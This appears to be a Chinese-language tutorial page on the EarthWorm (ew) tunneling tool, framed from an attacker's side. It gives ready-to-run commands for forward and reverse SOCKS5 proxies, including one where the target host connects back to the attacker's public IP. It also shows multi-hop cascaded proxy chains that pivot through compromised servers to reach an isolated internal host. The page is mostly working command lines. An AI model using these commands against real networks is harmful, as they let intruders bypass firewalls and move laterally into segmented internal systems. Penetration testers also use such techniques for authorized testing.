http://rootkiter.com/EarthWorm
注意防火墙是否关闭或端口是否开放!
使用方式:
1.正向代理
目标主机执行./ew ‐s ssocksd ‐l 1080
使用socks5代理工具连接目标主机IP,1080端口
2.反向代理
执行顺序:攻击主机->目标主机
攻击主机,8888为监听端口,1080为转发端口./ew ‐s rcsocks ‐l 1080 ‐e 8888
目标主机,1.1.1.1为攻击机的公网ip,8888为攻击机的监听端口./ew ‐s rssocks ‐d 1.1.1.1 ‐e 8888
使用socks5代理工具连接攻击机IP,1080端口
3. 多级级联
三层代理
目的:在A上访问E
代理链路经过B、C、D
攻击机A:10.108.2.68 攻击机
服务器B:10.108.2.31 可以连接外网、C。
服务器C:192.168.2.110 可以连接D,但不能连接E、外网
服务器D:192.168.2.100 可以连接C、E,不能连接外网
服务器E:192.168.5.22 内网服务器,不能连接外网
命令执行顺序:B-D-C
服务器B:10.108.2.31,将外部端口10800的流量转移到本地1080上ew ‐s lcx_listen ‐l 1080 ‐e 10800
服务器D:192.168.2.100,将本地流量使用socks5代理到10801端口ew ‐s ssocksd ‐l 10801
服务器C,192.168.2.110:将 B 和 D 端口绑定,建立 socks5 通道:ew ‐s lcx_slave ‐d 10.108.2.31 ‐e 10800 ‐f 192.168.2.100 ‐g 10801
攻击机 A ,使用 socks5 代理工具连接服务器 B 1080 端口socks5 10.108.2.31 1080
四层代理
目的:可以连接A的主机都能访问E
代理链路经过A、B、C、D
攻击机A:10.108.2.68 攻击机
服务器B:10.108.2.31 可以连接外网、C。
服务器C:192.168.2.110 可以连接D,但不能连接E、外网
服务器D:192.168.2.100 可以连接C、E,不能连接外网
服务器E:192.168.5.22 内网服务器,不能连接外网
命令执行顺序:A-C-B-D
攻击机A,10.108.2.68:将外部端口1090流量转移到本地1080端口
ew ‐s rcsocks ‐l 1080 ‐e 1090
服务器C,192.168.2.110:将外部 1092端口和本地1091端口绑定
ew ‐s lcx_listen ‐l 1091 ‐e 1092
服务器B,10.108.2.31:将 A 的1090端口和 C 的1091端口建立通信
ew ‐s lcx_slave ‐d 10.108.2.68 ‐e 1090 ‐f 192.168.2.110 ‐g 1091
服务器D,192.168.2.100:将本地流量使用socks5代理到 C 的1092端口
ew ‐s rssocks ‐d 192.168.2.110 ‐e 1092
使用socks5代理工具连接攻击机 A 的1080端口
socks5 10.108.2.68 1080
暂无评论内容